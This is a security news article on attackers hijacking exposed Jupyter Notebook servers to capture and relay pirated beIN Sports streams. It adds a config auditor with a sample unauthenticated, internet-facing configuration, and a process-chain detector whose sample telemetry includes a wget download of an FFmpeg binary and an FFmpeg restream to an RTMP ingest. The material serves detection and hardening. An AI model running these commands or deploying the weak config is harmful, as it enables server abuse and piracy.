Hacked Jupyter Notebooks used to stream pirated sports shows

December 2, 2024
Jupyter Notebooks Cloud Security Open Source Software Hacking Piracy

A new malicious campaign is targeting misconfigured Jupyter Notebooks to rebroadcast pirated sports streams.

Based on reports, threat actors are abusing exposed JupyterLab and Jupyter Notebook servers to rip live streams and facilitate sports piracy with stream-capture tooling. Analysis of the newly discovered operation shows the attackers hijacking unauthenticated Jupyter Notebook instances for initial access and then running a sequence of commands that lets them relay live broadcasts of sporting events.
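The misconfiguration this initial access depends on (a notebook server reachable from the network with token and password authentication switched off) can be checked for in the server's own configuration file. The following is an added example, not code from the report, the article, or the Jupyter project: it parses the `c.<App>.<trait> = <value>` lines of a `jupyter_server_config.py`, flags the weak settings, and shows a hardened configuration beside the weak one. Both configuration texts are constructed samples, the trait names are the Jupyter Server ones (with the legacy `NotebookApp` names accepted as well), and the password hash is a placeholder.

```python
"""Audit a jupyter_server_config.py for the exposure abused in this campaign.

Added example (not code from the report or from the Jupyter project).  The
traitlet names follow Jupyter Server; older deployments use c.NotebookApp.*
and the checks below accept both.  Both config texts are constructed samples.
"""
import ast
import re
from typing import Any, Dict, List

# Constructed weak configuration: reachable from any interface, remote access
# allowed, token and password both disabled, running as root.
WEAK_CONFIG = """
c.ServerApp.ip = '0.0.0.0'
c.ServerApp.port = 8888
c.ServerApp.open_browser = False
c.ServerApp.allow_remote_access = True
c.ServerApp.token = ''
c.ServerApp.password = ''
c.ServerApp.allow_root = True
"""

# Constructed hardened configuration: loopback only, token auth left at its
# default (random token), plus a hashed password.  The hash is a placeholder;
# generate a real one with `from jupyter_server.auth import passwd; passwd()`.
HARDENED_CONFIG = """
c.ServerApp.ip = '127.0.0.1'
c.ServerApp.port = 8888
c.ServerApp.open_browser = False
c.ServerApp.allow_remote_access = False
c.PasswordIdentityProvider.hashed_password = 'argon2:PLACEHOLDER_HASH_FROM_passwd()'
c.ServerApp.allow_root = False
"""

_LINE = re.compile(r"^\s*c\.([A-Za-z_][\w.]*)\s*=\s*(.+?)\s*$")


def parse_config(text: str) -> Dict[str, Any]:
    """Collect `c.<App>.<trait> = <literal>` assignments; other lines are ignored."""
    cfg: Dict[str, Any] = {}
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        try:
            cfg[m.group(1)] = ast.literal_eval(m.group(2))
        except (ValueError, SyntaxError):
            cfg[m.group(1)] = m.group(2)  # non-literal expression; keep raw text
    return cfg


def _get(cfg: Dict[str, Any], trait: str, default: Any = None) -> Any:
    """Look the trait up under ServerApp first, then the legacy NotebookApp name."""
    for app in ("ServerApp", "NotebookApp"):
        key = f"{app}.{trait}"
        if key in cfg:
            return cfg[key]
    return default


def audit(text: str) -> List[str]:
    """Return short finding codes for the weak settings present in the config."""
    cfg = parse_config(text)
    findings: List[str] = []

    ip = _get(cfg, "ip", "localhost")
    if ip in ("", "*", "0.0.0.0", "::") or _get(cfg, "allow_remote_access", False):
        findings.append("exposed-interface")

    # Jupyter generates a random token by default; an explicit '' turns it off.
    token_disabled = _get(cfg, "token") == ""
    if token_disabled:
        findings.append("token-disabled")

    has_password = bool(_get(cfg, "password")) or bool(
        cfg.get("PasswordIdentityProvider.hashed_password")
    )
    if token_disabled and not has_password:
        findings.append("no-authentication")

    if _get(cfg, "allow_root", False):
        findings.append("allow-root")

    if _get(cfg, "allow_origin") == "*":
        findings.append("wildcard-cors-origin")

    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {audit(text) or 'no findings'}")
```

The combination that matters most is `exposed-interface` together with `no-authentication`: that is the state in which anyone who can reach the port can open a terminal or kernel and run arbitrary commands, which is all the attackers in this campaign needed.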

The cloud security firm that reported the campaign identified the piracy effort, aimed at interactive environments commonly used for data science work, after an attack on its honeypots. Once inside, the threat actors first updated the server and then downloaded FFmpeg.

Updating the server and fetching FFmpeg is a necessary step for the operation, but it is not enough on its own to keep security tools from detecting the activity: both actions are noisy on a host that normally only runs notebooks. The attackers then used FFmpeg to capture live broadcasts of sporting events and redirect them to their own site, which streams the pirated video.


The primary objective of hijacking Jupyter Notebooks is to steal legitimate sporting event streams and post them on a website that can gather viewers.


According to the investigation, the core of the campaign is to download FFmpeg from MediaFire and use it to capture live sports feeds from Qatar's beIN Sports network.

The threat actors then rebroadcast the captured stream to their own illegal site via ustream[.]tv. The compromised Jupyter Notebook server and its resources are abused as the relay in this chain, and the threat actors earn advertising income from the illegally streamed broadcasts.
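The chain described in the paragraphs above (a notebook kernel spawning a package update, a download of FFmpeg from a file host, and an FFmpeg process whose output is an RTMP ingest) is also what a defender would look for in process telemetry. The following is an added example, not code from the report or from any vendor product: it takes process-start events with the fields an EDR or auditd `execve` record provides (pid, ppid, comm, cmdline), walks each process's ancestry, and flags package managers, downloaders and FFmpeg running under a Jupyter server or kernel, with an extra rule for FFmpeg pushing to `rtmp://`. The events are constructed, not real telemetry, and every URL and stream key in them is made up; a benign FFmpeg run under an SSH session is included to show it is not flagged.

```python
"""Flag the notebook-to-FFmpeg process chain described in the article.

Added example (not from the report or any vendor product).  It consumes
process-start events of the kind an EDR or auditd execve record provides
(pid, ppid, comm, cmdline).  The events below are constructed, not real
telemetry, and every URL and stream key in them is made up.
"""
import json
import shlex
from typing import Dict, Iterator, List, Tuple

# Constructed sample: pids 1200..1355 are the behaviour the article describes;
# pids 2001/2002 are an analyst running ffmpeg from an SSH session.
SAMPLE_EVENTS = """
{"pid": 1200, "ppid": 1, "comm": "jupyter-lab", "cmdline": "jupyter-lab --ip=0.0.0.0 --no-browser"}
{"pid": 1310, "ppid": 1200, "comm": "python3", "cmdline": "python3 -m ipykernel_launcher -f /tmp/kernel-1.json"}
{"pid": 1322, "ppid": 1310, "comm": "sh", "cmdline": "/bin/sh -c 'apt update'"}
{"pid": 1323, "ppid": 1322, "comm": "apt", "cmdline": "apt update"}
{"pid": 1340, "ppid": 1310, "comm": "wget", "cmdline": "wget https://www.mediafire.com/file/EXAMPLE/ffmpeg -O /tmp/ffmpeg"}
{"pid": 1355, "ppid": 1310, "comm": "ffmpeg", "cmdline": "/tmp/ffmpeg -i https://stream.example.net/live/index.m3u8 -c copy -f flv rtmp://ingest.example.org/live/STREAMKEY"}
{"pid": 2001, "ppid": 1, "comm": "sshd", "cmdline": "sshd: analyst@pts/0"}
{"pid": 2002, "ppid": 2001, "comm": "ffmpeg", "cmdline": "ffmpeg -i input.mp4 -vf scale=640:-1 out.mp4"}
"""

JUPYTER_MARKERS = ("jupyter", "ipykernel")
PACKAGE_MANAGERS = {"apt", "apt-get", "pip", "pip3", "yum", "dnf"}
DOWNLOADERS = {"wget", "curl"}

Event = Dict[str, object]


def load_events(text: str) -> List[Event]:
    """One JSON object per line; blank lines are skipped."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_jupyter(ev: Event) -> bool:
    return any(marker in str(ev["cmdline"]) for marker in JUPYTER_MARKERS)


def ancestors(pid: int, by_pid: Dict[int, Event]) -> Iterator[Event]:
    """Walk ppid links upwards; stops at unknown pids and guards against loops."""
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None:
        parent = by_pid.get(int(cur["ppid"]))
        if parent is None or parent["pid"] in seen:
            return
        seen.add(parent["pid"])
        yield parent
        cur = parent


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (pid, rule) pairs for processes matching the campaign's chain."""
    by_pid = {int(e["pid"]): e for e in events}
    alerts: List[Tuple[int, str]] = []
    for ev in events:
        pid, comm = int(ev["pid"]), str(ev["comm"])
        under_jupyter = any(is_jupyter(a) for a in ancestors(pid, by_pid))
        if not under_jupyter:
            continue  # the rules below are specific to a notebook-spawned process
        argv = shlex.split(str(ev["cmdline"]))
        if comm in PACKAGE_MANAGERS:
            alerts.append((pid, "package-manager-from-notebook"))
        elif comm in DOWNLOADERS:
            alerts.append((pid, "download-from-notebook"))
        elif comm == "ffmpeg":
            restream = any(a.startswith(("rtmp://", "rtmps://")) for a in argv)
            alerts.append((pid, "rtmp-restream-from-notebook" if restream else "ffmpeg-from-notebook"))
    return alerts


if __name__ == "__main__":
    for pid, rule in detect(load_events(SAMPLE_EVENTS)):
        print(f"pid {pid}: {rule}")
```

Keying the rules on ancestry rather than on `ffmpeg` alone is what keeps the analyst's transcode on pid 2002 out of the alert list; in a real deployment the parent lookup would come from the sensor's process tree rather than from a batch of events, but the logic is the same.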

Researchers have yet to attribute this campaign to any known threat group. However, a separate report noted that one IP address the threat actors used suggests they may be an Arabic-speaking group.

Still, it is important to note that the attackers gained access to a server used for data analysis, which could have significant ramifications for an organisation's operations.

Beyond piracy, a compromised notebook server exposes its owner to DDoS abuse, data manipulation, data theft, corruption of AI and ML pipelines, lateral movement into more critical environments, and significant financial and reputational harm.
